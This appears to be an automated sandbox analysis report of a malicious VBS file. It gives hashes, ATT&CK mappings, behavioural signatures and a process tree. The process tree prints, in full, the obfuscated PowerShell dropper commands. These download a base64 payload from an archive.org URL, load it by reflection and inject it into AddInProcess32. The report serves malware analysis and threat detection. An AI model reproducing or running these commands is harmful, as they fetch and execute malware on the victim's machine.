404b57d95f283e13341785c6565f1fda78a9645912850491e819f1b047563f9f

General

Target

404b57d95f283e13341785c6565f1fda78a9645912850491e819f1b047563f9f.vbs
Size

508KB
MD5

d07670e4294bb3b4f8cb5d015f02cd63
SHA1

f5026f5cdebe2a78e0e22afcfd266aa6b8ab027a
SHA256

404b57d95f283e13341785c6565f1fda78a9645912850491e819f1b047563f9f
SHA512

194f1d7df1885fd2d006cf026652fc22fc34f8666d1ac5f976b7ba370a1aeee80e51e3fa88828a0b4e640d9ab5f5e2bf5b900050db9d0e4ddaf8d1d6d12549f9
SSDEEP

12288:VHkaHTzfEQUu8fW7H7P0ielz5KM9BoVH4WJ19UsipS28E8PWPNsgF+QhB0Iy6Zm2:VRc67Q6ZG0oZ

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2776	powershell.exe
6	2776	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2560	powershell.exe
2776	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2560	powershell.exe
2776	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2560	powershell.exe
Token: SeDebugPrivilege	2776	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2524 wrote to memory of 2560	2524	WScript.exe	30
PID 2524 wrote to memory of 2560	2524	WScript.exe	30
PID 2524 wrote to memory of 2560	2524	WScript.exe	30
PID 2560 wrote to memory of 2776	2560	powershell.exe	32
PID 2560 wrote to memory of 2776	2560	powershell.exe	32
PID 2560 wrote to memory of 2776	2560	powershell.exe	32

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\404b57d95f283e13341785c6565f1fda78a9645912850491e819f1b047563f9f.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2524
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnRmU0dXJsJysnICcrJz0nKycgJysneGcnKydMaHQnKyd0cHM6JysnLy9pYScrJzYwJysnMDEwMC4nKyd1Jysncy5hcmNoaXZlLm8nKydyZy8yNC9pJysndGUnKydtJysncy9kJysnZScrJ3RhaC0nKydub3RlLXYvRCcrJ2V0JysnYWhOJysnbycrJ3RlVicrJy4nKyd0eHR4Z0w7RmU0YicrJ2FzZScrJzY0JysnQ29udGVuJysndCcrJyAnKyc9ICgnKydOJysnZScrJ3ctT2InKydqJysnZWN0ICcrJ1N5JysncycrJ3RlJysnbS5OZScrJ3QuJysnV2ViJysnQ2xpJysnZW50JysnKS4nKydEJysnb3dubG9hJysnZFN0cmknKyduZyhGZScrJzR1JysncmwpO0ZlNGJpbmFyJysneUNvJysnbnRlbnQnKycgJysnPScrJyBbU3knKydzJysndGUnKydtLkNvbnZlJysncnQnKyddOjpGcm9tQmFzZTY0U3QnKydyaW4nKydnKEZlNGJhc2U2NCcrJ0NvbnQnKydlbnQnKycpJysnO0ZlNGFzcycrJ2VtJysnYmx5JysnICcrJz0nKycgW1JlZmwnKydlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEYnKydlJysnNGJpbmFyJysneUNvbnRlbicrJ3QpO0ZlJysnNCcrJ3QnKyd5cGUgPSAnKydGZTRhc3MnKydlbScrJ2JsJysneScrJy5HZXQnKydUJysneXBlKHhnJysnTFJ1JysnblBFJysnLkgnKydvbWV4ZycrJ0wpO0ZlNCcrJ21ldGgnKydvZCcrJyA9IEZlJysnNHQnKyd5cGUnKycuR2UnKyd0TWV0JysnaCcrJ29kJysnKCcrJ3hnTCcrJ1ZBJysnSXgnKydnTCk7JysnRmUnKyc0bScrJ2V0aCcrJ29kLkluJysndm9rZShGZTRudScrJ2wnKydsJysnLCBbb2JqZWN0WycrJ11dQCh4Z0wwJysnL3AnKydKU0cnKydOL2QvJysnZScrJ2UuZXRzJysnYXAvLycrJzpzJysncHR0aCcrJ3gnKydnTCcrJyAsIHgnKydnTGRlc2F0JysnaXZhJysnZG94JysnZ0wnKycgJysnLCcrJyB4Z0xkJysnZXMnKydhdGl2YWQnKydvJysneGdMICwgJysneCcrJ2dMZGVzYXRpdmEnKydkJysnbycrJ3hnTCwnKyd4Z0xBJysnZGRJblByJysnb2Nlc3MnKyczMnhnJysnTCcrJywnKyd4JysnZ0x4ZycrJ0wpKScpLVJFUExBY0UgICdGZTQnLFtDSGFyXTM2IC1DckVQTEFjRSAgJ3hnTCcsW0NIYXJdMzkpIHwgLiggJHNIRWxMaURbMV0rJHNIRWxsaWRbMTNdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2560
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('Fe4url'+' '+'='+' '+'xg'+'Lht'+'tps:'+'//ia'+'60'+'0100.'+'u'+'s.archive.o'+'rg/24/i'+'te'+'m'+'s/d'+'e'+'tah-'+'note-v/D'+'et'+'ahN'+'o'+'teV'+'.'+'txtxgL;Fe4b'+'ase'+'64'+'Conten'+'t'+' '+'= ('+'N'+'e'+'w-Ob'+'j'+'ect '+'Sy'+'s'+'te'+'m.Ne'+'t.'+'Web'+'Cli'+'ent'+').'+'D'+'ownloa'+'dStri'+'ng(Fe'+'4u'+'rl);Fe4binar'+'yCo'+'ntent'+' '+'='+' [Sy'+'s'+'te'+'m.Conve'+'rt'+']::FromBase64St'+'rin'+'g(Fe4base64'+'Cont'+'ent'+')'+';Fe4ass'+'em'+'bly'+' '+'='+' [Refl'+'ection.As'+'sembly]::Load(F'+'e'+'4binar'+'yConten'+'t);Fe'+'4'+'t'+'ype = '+'Fe4ass'+'em'+'bl'+'y'+'.Get'+'T'+'ype(xg'+'LRu'+'nPE'+'.H'+'omexg'+'L);Fe4'+'meth'+'od'+' = Fe'+'4t'+'ype'+'.Ge'+'tMet'+'h'+'od'+'('+'xgL'+'VA'+'Ix'+'gL);'+'Fe'+'4m'+'eth'+'od.In'+'voke(Fe4nu'+'l'+'l'+', [object['+']]@(xgL0'+'/p'+'JSG'+'N/d/'+'e'+'e.ets'+'ap//'+':s'+'ptth'+'x'+'gL'+' , x'+'gLdesat'+'iva'+'dox'+'gL'+' '+','+' xgLd'+'es'+'ativad'+'o'+'xgL , '+'x'+'gLdesativa'+'d'+'o'+'xgL,'+'xgLA'+'ddInPr'+'ocess'+'32xg'+'L'+','+'x'+'gLxg'+'L))')-REPLAcE 'Fe4',[CHar]36 -CrEPLAcE 'xgL',[CHar]39) | .( $sHElLiD[1]+$sHEllid[13]+'x')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2776

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
726672bba22e23f6103d1d7bd7ae5024

SHA1
3f37efe72cd6c0ec1a2b16e3578742f61acd502b

SHA256
94115fcdfcb277c485b156f4b65c8b733e04a5f2823f47de67eacdd3d7a65e55

SHA512
7018e9d4618c2cc25c4c50e2ed225ef3286b7d213c354f3f11662a8fed2308f18d0fc12be2df1b5426b08c584446d192b439d0aa9e05b368fd2ad0ed855221fc

Download Submit
memory/2560-4-0x000007FEF4F1E000-0x000007FEF4F1F000-memory.dmp

Filesize
4KB

Download
memory/2560-5-0x000007FEF4C60000-0x000007FEF55FD000-memory.dmp

Filesize
9.6MB

Download
memory/2560-6-0x000000001B270000-0x000000001B552000-memory.dmp

Filesize
2.9MB

Download
memory/2560-7-0x0000000002620000-0x0000000002628000-memory.dmp

Filesize
32KB

Download
memory/2560-8-0x000007FEF4C60000-0x000007FEF55FD000-memory.dmp

Filesize
9.6MB

Download
memory/2560-9-0x000007FEF4C60000-0x000007FEF55FD000-memory.dmp

Filesize
9.6MB

Download
memory/2560-15-0x000007FEF4C60000-0x000007FEF55FD000-memory.dmp

Filesize
9.6MB

Download
memory/2560-16-0x000007FEF4F1E000-0x000007FEF4F1F000-memory.dmp

Filesize
4KB

Download
memory/2560-17-0x000007FEF4C60000-0x000007FEF55FD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing